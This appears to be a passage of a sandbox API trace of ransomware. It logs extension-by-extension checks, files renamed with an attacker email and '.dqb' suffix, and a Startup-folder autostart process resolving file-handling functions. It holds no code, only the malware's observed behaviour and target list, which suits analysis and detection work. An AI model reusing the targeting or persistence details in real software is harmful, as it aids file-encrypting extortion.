[0268.885] lstrlenW (lpString=".gif") returned 4 [0268.885] lstrcmpiW (lpString1=".gif", lpString2=".ini") returned -1 [0268.885] lstrlenW (lpString=".grs") returned 4 [0268.885] lstrcmpiW (lpString1=".grs", lpString2=".ini") returned -1 [0268.885] lstrlenW (lpString=".gz") returned 3 [0268.885] lstrcmpiW (lpString1=".gz", lpString2="ini") returned -1 [0268.885] lstrlenW (lpString=".h") returned 2 [0268.885] lstrcmpiW (lpString1=".h", lpString2="ni") returned -1 [0268.885] lstrlenW (lpString=".hdr") returned 4 [0268.885] lstrcmpiW (lpString1=".hdr", lpString2=".ini") returned -1 [0268.886] lstrlenW (lpString=".hpp") returned 4 [0268.886] lstrcmpiW (lpString1=".hpp", lpString2=".ini") returned -1 [0268.886] lstrlenW (lpString=".hta") returned 4 [0268.886] lstrcmpiW (lpString1=".hta", lpString2=".ini") returned -1 [0268.886] lstrlenW (lpString=".htc") returned 4 [0268.886] lstrcmpiW (lpString1=".htc", lpString2=".ini") returned -1 [0268.886] lstrlenW (lpString=".htm") returned 4 [0268.886] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0268.886] lstrlenW (lpString=".html") returned 5 [0268.886] lstrcmpiW (lpString1=".html", lpString2="p.ini") returned -1 [0268.886] lstrlenW (lpString=".icb") returned 4 [0268.886] lstrcmpiW (lpString1=".icb", lpString2=".ini") returned -1 [0268.886] lstrlenW (lpString=".ics") returned 4 [0268.886] lstrcmpiW (lpString1=".ics", lpString2=".ini") returned -1 [0268.886] lstrlenW (lpString=".iff") returned 4 [0268.886] lstrcmpiW (lpString1=".iff", lpString2=".ini") returned -1 [0268.886] lstrlenW (lpString=".inc") returned 4 [0268.886] lstrcmpiW (lpString1=".inc", lpString2=".ini") returned -1 [0268.886] lstrlenW (lpString=".indd") returned 5 [0268.886] lstrcmpiW (lpString1=".indd", lpString2="p.ini") returned -1 [0268.886] lstrlenW (lpString=".ini") returned 4 [0268.886] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0268.886] FindNextFileW (in: hFindFile=0x63d2c8, lpFindFileData=0x374f808 | out: lpFindFileData=0x374f808*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3c2ea030, ftCreationTime.dwHighDateTime=0x1d5351d, ftLastAccessTime.dwLowDateTime=0x3c2ea030, ftLastAccessTime.dwHighDateTime=0x1d5351d, ftLastWriteTime.dwLowDateTime=0x3c310190, ftLastWriteTime.dwHighDateTime=0x1d5351d, nFileSizeHigh=0x0, nFileSizeLow=0x17a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini.id-9C354B42.[btcdecoding@qq.com].dqb", cAlternateFileName="DESKTO~1.DQB")) returned 1 [0268.886] lstrlenW (lpString="desktop.ini.id-9C354B42.[btcdecoding@qq.com].dqb") returned 48 [0268.886] lstrlenW (lpString=".1cd") returned 4 [0268.886] lstrcmpiW (lpString1=".1cd", lpString2=".dqb") returned -1 [0268.886] lstrlenW (lpString=".3ds") returned 4 [0268.886] lstrcmpiW (lpString1=".3ds", lpString2=".dqb") returned -1 [0268.886] lstrlenW (lpString=".3fr") returned 4 [0268.886] lstrcmpiW (lpString1=".3fr", lpString2=".dqb") returned -1 [0268.886] lstrlenW (lpString=".3g2") returned 4 [0268.886] lstrcmpiW (lpString1=".3g2", lpString2=".dqb") returned -1 [0268.886] lstrlenW (lpString=".3gp") returned 4 [0268.887] lstrcmpiW (lpString1=".3gp", lpString2=".dqb") returned -1 [0268.887] lstrlenW (lpString=".7z") returned 3 [0268.887] lstrcmpiW (lpString1=".7z", lpString2="dqb") returned -1 [0268.887] lstrlenW (lpString=".accda") returned 6 [0268.887] lstrcmpiW (lpString1=".accda", lpString2="m].dqb") returned -1 [0268.887] lstrlenW (lpString=".accdb") returned 6 [0268.887] lstrcmpiW (lpString1=".accdb", lpString2="m].dqb") returned -1 [0268.887] lstrlenW (lpString=".accdc") returned 6 [0268.887] lstrcmpiW (lpString1=".accdc", lpString2="m].dqb") returned -1 [0268.887] lstrlenW (lpString=".accde") returned 6 [0268.887] lstrcmpiW (lpString1=".accde", lpString2="m].dqb") returned -1 [0268.887] lstrlenW (lpString=".accdt") returned 6 [0268.887] lstrcmpiW (lpString1=".accdt", lpString2="m].dqb") returned -1 [0268.887] lstrlenW (lpString=".accdw") returned 6 [0268.887] lstrcmpiW (lpString1=".accdw", lpString2="m].dqb") returned -1 [0268.887] lstrlenW (lpString=".adb") returned 4 [0268.887] lstrcmpiW (lpString1=".adb", lpString2=".dqb") returned -1 [0268.887] lstrlenW (lpString=".adp") returned 4 [0268.887] lstrcmpiW (lpString1=".adp", lpString2=".dqb") returned -1 [0268.887] lstrlenW (lpString=".ai") returned 3 [0268.887] lstrcmpiW (lpString1=".ai", lpString2="dqb") returned -1 [0268.887] lstrlenW (lpString=".ai3") returned 4 [0268.887] lstrcmpiW (lpString1=".ai3", lpString2=".dqb") returned -1 [0268.887] lstrlenW (lpString=".ai4") returned 4 [0268.887] lstrcmpiW (lpString1=".ai4", lpString2=".dqb") returned -1 [0268.887] lstrlenW (lpString=".ai5") returned 4 [0268.887] lstrcmpiW (lpString1=".ai5", lpString2=".dqb") returned -1 [0268.887] lstrlenW (lpString=".ai6") returned 4 [0268.887] lstrcmpiW (lpString1=".ai6", lpString2=".dqb") returned -1 [0268.887] lstrlenW (lpString=".ai7") returned 4 [0268.887] lstrcmpiW (lpString1=".ai7", lpString2=".dqb") returned -1 [0268.887] lstrlenW (lpString=".ai8") returned 4 [0268.887] lstrcmpiW (lpString1=".ai8", lpString2=".dqb") returned -1 [0268.887] lstrlenW (lpString=".anim") returned 5 [0268.887] lstrcmpiW (lpString1=".anim", lpString2="].dqb") returned -1 [0268.888] lstrlenW (lpString=".arw") returned 4 [0268.888] lstrcmpiW (lpString1=".arw", lpString2=".dqb") returned -1 [0268.888] lstrlenW (lpString=".as") returned 3 [0268.888] lstrcmpiW (lpString1=".as", lpString2="dqb") returned -1 [0268.888] lstrlenW (lpString=".asa") returned 4 [0268.888] lstrcmpiW (lpString1=".asa", lpString2=".dqb") returned -1 [0268.888] lstrlenW (lpString=".asc") returned 4 [0268.888] lstrcmpiW (lpString1=".asc", lpString2=".dqb") returned -1 [0268.888] lstrlenW (lpString=".ascx") returned 5 [0268.888] lstrcmpiW (lpString1=".ascx", lpString2="].dqb") returned -1 [0268.888] lstrlenW (lpString=".asm") returned 4 [0268.888] lstrcmpiW (lpString1=".asm", lpString2=".dqb") returned -1 [0268.888] lstrlenW (lpString=".asmx") returned 5 [0268.888] lstrcmpiW (lpString1=".asmx", lpString2="].dqb") returned -1 [0268.888] lstrlenW (lpString=".asp") returned 4 [0268.888] lstrcmpiW (lpString1=".asp", lpString2=".dqb") returned -1 [0268.888] lstrlenW (lpString=".aspx") returned 5 [0268.888] lstrcmpiW (lpString1=".aspx", lpString2="].dqb") returned -1 [0268.888] lstrlenW (lpString=".asr") returned 4 [0268.888] lstrcmpiW (lpString1=".asr", lpString2=".dqb") returned -1 [0268.888] lstrlenW (lpString=".asx") returned 4 [0268.888] lstrcmpiW (lpString1=".asx", lpString2=".dqb") returned -1 [0268.888] lstrlenW (lpString=".avi") returned 4 [0268.888] lstrcmpiW (lpString1=".avi", lpString2=".dqb") returned -1 [0268.888] lstrlenW (lpString=".avs") returned 4 [0268.888] lstrcmpiW (lpString1=".avs", lpString2=".dqb") returned -1 [0268.888] lstrlenW (lpString=".backup") returned 7 [0268.888] lstrcmpiW (lpString1=".backup", lpString2="om].dqb") returned -1 [0268.888] lstrlenW (lpString=".bak") returned 4 [0268.888] lstrcmpiW (lpString1=".bak", lpString2=".dqb") returned -1 [0268.888] lstrlenW (lpString=".bay") returned 4 [0268.888] lstrcmpiW (lpString1=".bay", lpString2=".dqb") returned -1 [0268.888] lstrlenW (lpString=".bd") returned 3 [0268.888] lstrcmpiW (lpString1=".bd", lpString2="dqb") returned -1 [0268.889] lstrlenW (lpString=".bin") returned 4 [0268.889] lstrcmpiW (lpString1=".bin", lpString2=".dqb") returned -1 [0268.889] lstrlenW (lpString=".bmp") returned 4 [0268.889] lstrcmpiW (lpString1=".bmp", lpString2=".dqb") returned -1 [0268.889] lstrlenW (lpString=".bz2") returned 4 [0268.889] lstrcmpiW (lpString1=".bz2", lpString2=".dqb") returned -1 [0268.889] lstrlenW (lpString=".c") returned 2 [0268.889] lstrcmpiW (lpString1=".c", lpString2="qb") returned -1 [0268.889] lstrlenW (lpString=".cdr") returned 4 [0268.889] lstrcmpiW (lpString1=".cdr", lpString2=".dqb") returned -1 [0268.889] lstrlenW (lpString=".cer") returned 4 [0268.889] lstrcmpiW (lpString1=".cer", lpString2=".dqb") returned -1 [0268.889] lstrlenW (lpString=".cf") returned 3 [0268.889] lstrcmpiW (lpString1=".cf", lpString2="dqb") returned -1 [0268.889] lstrlenW (lpString=".cfc") returned 4 [0268.889] lstrcmpiW (lpString1=".cfc", lpString2=".dqb") returned -1 [0268.889] lstrlenW (lpString=".cfm") returned 4 [0268.889] lstrcmpiW (lpString1=".cfm", lpString2=".dqb") returned -1 [0268.889] lstrlenW (lpString=".cfml") returned 5 [0268.889] lstrcmpiW (lpString1=".cfml", lpString2="].dqb") returned -1 [0268.889] lstrlenW (lpString=".cfu") returned 4 [0268.889] lstrcmpiW (lpString1=".cfu", lpString2=".dqb") returned -1 [0268.889] lstrlenW (lpString=".chm") returned 4 [0268.889] lstrcmpiW (lpString1=".chm", lpString2=".dqb") returned -1 [0268.889] lstrlenW (lpString=".cin") returned 4 [0268.889] lstrcmpiW (lpString1=".cin", lpString2=".dqb") returned -1 [0268.889] lstrlenW (lpString=".class") returned 6 [0268.889] lstrcmpiW (lpString1=".class", lpString2="m].dqb") returned -1 [0268.889] lstrlenW (lpString=".clx") returned 4 [0268.889] lstrcmpiW (lpString1=".clx", lpString2=".dqb") returned -1 [0268.889] lstrlenW (lpString=".config") returned 7 [0268.889] lstrcmpiW (lpString1=".config", lpString2="om].dqb") returned -1 [0268.889] lstrlenW (lpString=".cpp") returned 4 [0268.889] lstrcmpiW (lpString1=".cpp", lpString2=".dqb") returned -1 [0268.890] lstrlenW (lpString=".cr2") returned 4 [0268.890] lstrcmpiW (lpString1=".cr2", lpString2=".dqb") returned -1 [0268.890] lstrlenW (lpString=".crt") returned 4 [0268.890] lstrcmpiW (lpString1=".crt", lpString2=".dqb") returned -1 [0268.890] lstrlenW (lpString=".crw") returned 4 [0268.890] lstrcmpiW (lpString1=".crw", lpString2=".dqb") returned -1 [0268.890] lstrlenW (lpString=".cs") returned 3 [0268.890] lstrcmpiW (lpString1=".cs", lpString2="dqb") returned -1 [0268.890] lstrlenW (lpString=".css") returned 4 [0268.890] lstrcmpiW (lpString1=".css", lpString2=".dqb") returned -1 [0268.890] lstrlenW (lpString=".csv") returned 4 [0268.890] lstrcmpiW (lpString1=".csv", lpString2=".dqb") returned -1 [0268.890] lstrlenW (lpString=".cub") returned 4 [0268.890] lstrcmpiW (lpString1=".cub", lpString2=".dqb") returned -1 [0268.890] lstrlenW (lpString=".dae") returned 4 [0268.890] lstrcmpiW (lpString1=".dae", lpString2=".dqb") returned -1 [0268.890] lstrlenW (lpString=".dat") returned 4 [0268.890] lstrcmpiW (lpString1=".dat", lpString2=".dqb") returned -1 [0268.890] lstrlenW (lpString=".db") returned 3 [0268.890] lstrcmpiW (lpString1=".db", lpString2="dqb") returned -1 [0268.890] lstrlenW (lpString=".dbf") returned 4 [0268.890] lstrcmpiW (lpString1=".dbf", lpString2=".dqb") returned -1 [0268.890] lstrlenW (lpString=".dbx") returned 4 [0268.890] lstrcmpiW (lpString1=".dbx", lpString2=".dqb") returned -1 [0268.890] lstrlenW (lpString=".dc3") returned 4 [0268.890] lstrcmpiW (lpString1=".dc3", lpString2=".dqb") returned -1 [0268.890] lstrlenW (lpString=".dcm") returned 4 [0268.890] lstrcmpiW (lpString1=".dcm", lpString2=".dqb") returned -1 [0268.890] lstrlenW (lpString=".dcr") returned 4 [0268.890] lstrcmpiW (lpString1=".dcr", lpString2=".dqb") returned -1 [0268.890] lstrlenW (lpString=".der") returned 4 [0268.890] lstrcmpiW (lpString1=".der", lpString2=".dqb") returned -1 [0268.890] lstrlenW (lpString=".dib") returned 4 [0268.890] lstrcmpiW (lpString1=".dib", lpString2=".dqb") returned -1 [0268.890] lstrlenW (lpString=".dic") returned 4 [0268.891] lstrcmpiW (lpString1=".dic", lpString2=".dqb") returned -1 [0268.891] lstrlenW (lpString=".dif") returned 4 [0268.891] lstrcmpiW (lpString1=".dif", lpString2=".dqb") returned -1 [0268.891] lstrlenW (lpString=".divx") returned 5 [0268.891] lstrcmpiW (lpString1=".divx", lpString2="].dqb") returned -1 [0268.891] lstrlenW (lpString=".djvu") returned 5 [0268.891] lstrcmpiW (lpString1=".djvu", lpString2="].dqb") returned -1 [0268.891] lstrlenW (lpString=".dng") returned 4 [0268.891] lstrcmpiW (lpString1=".dng", lpString2=".dqb") returned -1 [0268.891] lstrlenW (lpString=".doc") returned 4 [0268.891] lstrcmpiW (lpString1=".doc", lpString2=".dqb") returned -1 [0268.891] lstrlenW (lpString=".docm") returned 5 [0268.891] lstrcmpiW (lpString1=".docm", lpString2="].dqb") returned -1 [0268.891] lstrlenW (lpString=".docx") returned 5 [0268.891] lstrcmpiW (lpString1=".docx", lpString2="].dqb") returned -1 [0268.891] lstrlenW (lpString=".dot") returned 4 [0268.891] lstrcmpiW (lpString1=".dot", lpString2=".dqb") returned -1 [0268.891] lstrlenW (lpString=".dotm") returned 5 [0268.891] lstrcmpiW (lpString1=".dotm", lpString2="].dqb") returned -1 [0268.891] lstrlenW (lpString=".dotx") returned 5 [0268.891] lstrcmpiW (lpString1=".dotx", lpString2="].dqb") returned -1 [0268.891] lstrlenW (lpString=".dpx") returned 4 [0268.891] lstrcmpiW (lpString1=".dpx", lpString2=".dqb") returned -1 [0268.891] lstrlenW (lpString=".dqy") returned 4 [0268.891] lstrcmpiW (lpString1=".dqy", lpString2=".dqb") returned 1 [0268.891] lstrlenW (lpString=".dsn") returned 4 [0268.891] lstrcmpiW (lpString1=".dsn", lpString2=".dqb") returned 1 [0268.891] lstrlenW (lpString=".dt") returned 3 [0268.891] lstrcmpiW (lpString1=".dt", lpString2="dqb") returned -1 [0268.891] lstrlenW (lpString=".dtd") returned 4 [0268.891] lstrcmpiW (lpString1=".dtd", lpString2=".dqb") returned 1 [0268.891] lstrlenW (lpString=".dwg") returned 4 [0268.891] lstrcmpiW (lpString1=".dwg", lpString2=".dqb") returned 1 [0268.891] lstrlenW (lpString=".dwt") returned 4 [0268.891] lstrcmpiW (lpString1=".dwt", lpString2=".dqb") returned 1 [0268.892] lstrlenW (lpString=".dx") returned 3 [0268.892] lstrcmpiW (lpString1=".dx", lpString2="dqb") returned -1 [0268.892] lstrlenW (lpString=".dxf") returned 4 [0268.892] lstrcmpiW (lpString1=".dxf", lpString2=".dqb") returned 1 [0268.892] lstrlenW (lpString=".edml") returned 5 [0268.892] lstrcmpiW (lpString1=".edml", lpString2="].dqb") returned -1 [0268.892] lstrlenW (lpString=".efd") returned 4 [0268.892] lstrcmpiW (lpString1=".efd", lpString2=".dqb") returned 1 [0268.892] lstrlenW (lpString=".elf") returned 4 [0268.892] lstrcmpiW (lpString1=".elf", lpString2=".dqb") returned 1 [0268.892] lstrlenW (lpString=".emf") returned 4 [0268.892] lstrcmpiW (lpString1=".emf", lpString2=".dqb") returned 1 [0268.892] lstrlenW (lpString=".emz") returned 4 [0268.892] lstrcmpiW (lpString1=".emz", lpString2=".dqb") returned 1 [0268.892] lstrlenW (lpString=".epf") returned 4 [0268.892] lstrcmpiW (lpString1=".epf", lpString2=".dqb") returned 1 [0268.892] lstrlenW (lpString=".eps") returned 4 [0268.892] lstrcmpiW (lpString1=".eps", lpString2=".dqb") returned 1 [0268.892] lstrlenW (lpString=".epsf") returned 5 [0268.892] lstrcmpiW (lpString1=".epsf", lpString2="].dqb") returned -1 [0268.892] lstrlenW (lpString=".epsp") returned 5 [0268.892] lstrcmpiW (lpString1=".epsp", lpString2="].dqb") returned -1 [0268.892] lstrlenW (lpString=".erf") returned 4 [0268.892] lstrcmpiW (lpString1=".erf", lpString2=".dqb") returned 1 [0268.892] lstrlenW (lpString=".exr") returned 4 [0268.892] lstrcmpiW (lpString1=".exr", lpString2=".dqb") returned 1 [0268.892] lstrlenW (lpString=".f4v") returned 4 [0268.892] lstrcmpiW (lpString1=".f4v", lpString2=".dqb") returned 1 [0268.892] lstrlenW (lpString=".fido") returned 5 [0268.892] lstrcmpiW (lpString1=".fido", lpString2="].dqb") returned -1 [0268.892] lstrlenW (lpString=".flm") returned 4 [0268.892] lstrcmpiW (lpString1=".flm", lpString2=".dqb") returned 1 [0268.892] lstrlenW (lpString=".flv") returned 4 [0268.892] lstrcmpiW (lpString1=".flv", lpString2=".dqb") returned 1 [0268.893] lstrlenW (lpString=".frm") returned 4 [0268.893] lstrcmpiW (lpString1=".frm", lpString2=".dqb") returned 1 [0268.893] lstrlenW (lpString=".fxg") returned 4 [0268.893] lstrcmpiW (lpString1=".fxg", lpString2=".dqb") returned 1 [0268.893] lstrlenW (lpString=".geo") returned 4 [0268.893] lstrcmpiW (lpString1=".geo", lpString2=".dqb") returned 1 [0268.893] lstrlenW (lpString=".gif") returned 4 [0268.893] lstrcmpiW (lpString1=".gif", lpString2=".dqb") returned 1 [0268.893] lstrlenW (lpString=".grs") returned 4 [0268.893] lstrcmpiW (lpString1=".grs", lpString2=".dqb") returned 1 [0269.162] FindNextFileW (in: hFindFile=0x41800b0, lpFindFileData=0x374f094 | out: lpFindFileData=0x374f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0269.163] FindNextFileW (in: hFindFile=0x41800b0, lpFindFileData=0x374f094 | out: lpFindFileData=0x374f094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe92d84cc, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe94ed7e2, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe94ed7e2, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0270.069] FindNextFileW (in: hFindFile=0x41804f0, lpFindFileData=0x374f094 | out: lpFindFileData=0x374f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51767f50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x4184f570, ftLastAccessTime.dwHighDateTime=0x1d5351d, ftLastWriteTime.dwLowDateTime=0x4184f570, ftLastWriteTime.dwHighDateTime=0x1d5351d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0270.069] FindNextFileW (in: hFindFile=0x41804f0, lpFindFileData=0x374f094 | out: lpFindFileData=0x374f094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd394600, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x51767f50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdd394600, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0x189be, dwReserved0=0x0, dwReserved1=0x0, cFileName="AXIS.ELM", cAlternateFileName="")) returned 1 [0270.069] FindNextFileW (in: hFindFile=0x41804f0, lpFindFileData=0x374f094 | out: lpFindFileData=0x374f094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8baae400, ftCreationTime.dwHighDateTime=0x1c43125, ftLastAccessTime.dwLowDateTime=0x5f409670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8baae400, ftLastWriteTime.dwHighDateTime=0x1c43125, nFileSizeHigh=0x0, nFileSizeLow=0x211, dwReserved0=0x0, dwReserved1=0x0, cFileName="AXIS.INF", cAlternateFileName="")) returned 1 [0270.069] FindNextFileW (in: hFindFile=0x41804f0, lpFindFileData=0x374f094 | out: lpFindFileData=0x374f094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4184f570, ftCreationTime.dwHighDateTime=0x1d5351d, ftLastAccessTime.dwLowDateTime=0x4184f570, ftLastAccessTime.dwHighDateTime=0x1d5351d, ftLastWriteTime.dwLowDateTime=0x4189b830, ftLastWriteTime.dwHighDateTime=0x1d5351d, nFileSizeHigh=0x0, nFileSizeLow=0xc1a, dwReserved0=0x0, dwReserved1=0x0, cFileName="PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", cAlternateFileName="PREVIE~1.DQB")) returned 1 [0270.087] FindNextFileW (in: hFindFile=0x41804f0, lpFindFileData=0x374f094 | out: lpFindFileData=0x374f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a61ad0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x41a8aa10, ftLastAccessTime.dwHighDateTime=0x1d5351d, ftLastWriteTime.dwLowDateTime=0x41a8aa10, ftLastWriteTime.dwHighDateTime=0x1d5351d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0270.087] FindNextFileW (in: hFindFile=0x41804f0, lpFindFileData=0x374f094 | out: lpFindFileData=0x374f094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea563500, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x51a61ad0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xea563500, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0x1a537, dwReserved0=0x0, dwReserved1=0x0, cFileName="BREEZE.ELM", cAlternateFileName="")) returned 1 [0271.205] FindNextFileW (in: hFindFile=0x41803b0, lpFindFileData=0x374f094 | out: lpFindFileData=0x374f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a42070, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0x43a14d90, ftLastAccessTime.dwHighDateTime=0x1d5351d, ftLastWriteTime.dwLowDateTime=0x43a14d90, ftLastWriteTime.dwHighDateTime=0x1d5351d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0271.212] FindNextFileW (in: hFindFile=0x41803b0, lpFindFileData=0x374f094 | out: lpFindFileData=0x374f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x617be070, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd504b000, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd504b000, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 Thread: id = 103 os_tid = 0x6a4 Thread: id = 104 os_tid = 0x6a8 Process: id = "10" image_name = "ivttvf.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\ivttvf.exe" page_root = "0x74352000" os_pid = "0x4e8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "autostart" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ivttvf.exe\" " cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e105" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 82 os_tid = 0x4ec [0262.846] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76e20000 [0262.847] GetProcAddress (hModule=0x76e20000, lpProcName="GetProcAddress") returned 0x76e31222 [0262.847] GetProcAddress (hModule=0x76e20000, lpProcName="GetModuleHandleW") returned 0x76e334b0 [0262.847] GetProcAddress (hModule=0x76e20000, lpProcName="FindNextFileW") returned 0x76e354ee [0262.847] GetProcAddress (hModule=0x76e20000, lpProcName="FindClose") returned 0x76e34442 [0262.847] GetProcAddress (hModule=0x76e20000, lpProcName="MoveFileW") returned 0x76e49af0 [0262.847] GetProcAddress (hModule=0x76e20000, lpProcName="GetFileSizeEx") returned 0x76e359e2 [0262.847] GetProcAddress (hModule=0x76e20000, lpProcName="GetModuleFileNameW") returned 0x76e34950 [0262.847] GetProcAddress (hModule=0x76e20000, lpProcName="GetFileAttributesW") returned 0x76e31b18 [0262.848] GetProcAddress (hModule=0x76e20000, lpProcName="ExitProcess") returned 0x76e37a10 [0262.848] GetProcAddress (hModule=0x76e20000, lpProcName="GetCommandLineW") returned 0x76e35223 [0262.848] GetProcAddress (hModule=0x76e20000, lpProcName="GetComputerNameW") returned 0x76e3dd0e [0262.848] GetProcAddress (hModule=0x76e20000, lpProcName="GetComputerNameA") returned 0x76e4b6e0 [0262.848] GetProcAddress (hModule=0x76e20000, lpProcName="CreateMutexW") returned 0x76e3424c [0262.848] GetProcAddress (hModule=0x76e20000, lpProcName="lstrlenW") returned 0x76e31700 [0262.848] GetProcAddress (hModule=0x76e20000, lpProcName="lstrlenA") returned 0x76e35a4b [0262.848] GetProcAddress (hModule=0x76e20000, lpProcName="GetCurrentProcess") returned 0x76e31809 [0262.848] GetProcAddress (hModule=0x76e20000, lpProcName="WaitForSingleObject") returned 0x76e31136 [0262.848] GetProcAddress (hModule=0x76e20000, lpProcName="GetLogicalDrives") returned 0x76e35371 [0262.848] GetProcAddress (hModule=0x76e20000, lpProcName="GetTickCount") returned 0x76e3110c [0262.848] GetProcAddress (hModule=0x76e20000, lpProcName="DeleteFileW") returned 0x76e389b3 [0262.848] GetProcAddress (hModule=0x76e20000, lpProcName="WideCharToMultiByte") returned 0x76e3170d [0262.848] GetProcAddress (hModule=0x76e20000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76e31916 [0262.848] GetProcAddress (hModule=0x76e20000, lpProcName="Sleep") returned 0x76e310ff [0262.848] GetProcAddress (hModule=0x76e20000, lpProcName="LeaveCriticalSection") returned 0x77df2270 [0262.848] GetProcAddress (hModule=0x76e20000, lpProcName="ReadFile") returned 0x76e33ed3 [0262.848] GetProcAddress (hModule=0x76e20000, lpProcName="CreateFileW") returned 0x76e33f5c [0262.848] GetProcAddress (hModule=0x76e20000, lpProcName="OpenMutexW") returned 0x76e35151 [0262.848] GetProcAddress (hModule=0x76e20000, lpProcName="EnterCriticalSection") returned 0x77df22b0 [0262.848] GetProcAddress (hModule=0x76e20000, lpProcName="WaitForMultipleObjects") returned 0x76e34220 [0262.849] GetProcAddress (hModule=0x76e20000, lpProcName="lstrcmpiW") returned 0x76e4d5cd [0262.849] GetProcAddress (hModule=0x76e20000, lpProcName="lstrcmpiA") returned 0x76e33e8e [0262.849] GetProcAddress (hModule=0x76e20000, lpProcName="DeleteCriticalSection") returned 0x77e045f5 [0262.849] GetProcAddress (hModule=0x76e20000, lpProcName="ReleaseMutex") returned 0x76e3111e [0262.849] GetProcAddress (hModule=0x76e20000, lpProcName="CloseHandle") returned 0x76e31410 [0262.849] GetProcAddress (hModule=0x76e20000, lpProcName="GetVersion") returned 0x76e34467 [0262.849] GetProcAddress (hModule=0x76e20000, lpProcName="CreateThread") returned 0x76e334d5 [0262.849] GetProcAddress (hModule=0x76e20000, lpProcName="ExpandEnvironmentStringsW") returned 0x76e34173 [0262.849] GetProcAddress (hModule=0x76e20000, lpProcName="QueryPerformanceCounter") returned 0x76e31725 [0262.849] GetProcAddress (hModule=0x76e20000, lpProcName="QueryPerformanceFrequency") returned 0x76e341f0 [0262.849] GetProcAddress (hModule=0x76e20000, lpProcName="GetCurrentProcessId") returned 0x76e311f8 [0262.849] GetProcAddress (hModule=0x76e20000, lpProcName="SetFileAttributesW") returned 0x76e4d4f7 [0262.849] GetProcAddress (hModule=0x76e20000, lpProcName="GetVolumeInformationW") returned 0x76e4c860 [0262.849] GetProcAddress (hModule=0x76e20000, lpProcName="WriteFile") returned 0x76e31282 [0262.849] GetProcAddress (hModule=0x76e20000, lpProcName="SetFilePointerEx") returned 0x76e4c807 [0262.849] GetProcAddress (hModule=0x76e20000, lpProcName="SetEndOfFile") returned 0x76e4ce2e [0262.849] GetProcAddress (hModule=0x76e20000, lpProcName="FindFirstFileW") returned 0x76e34435 [0262.849] GetProcAddress (hModule=0x76e20000, 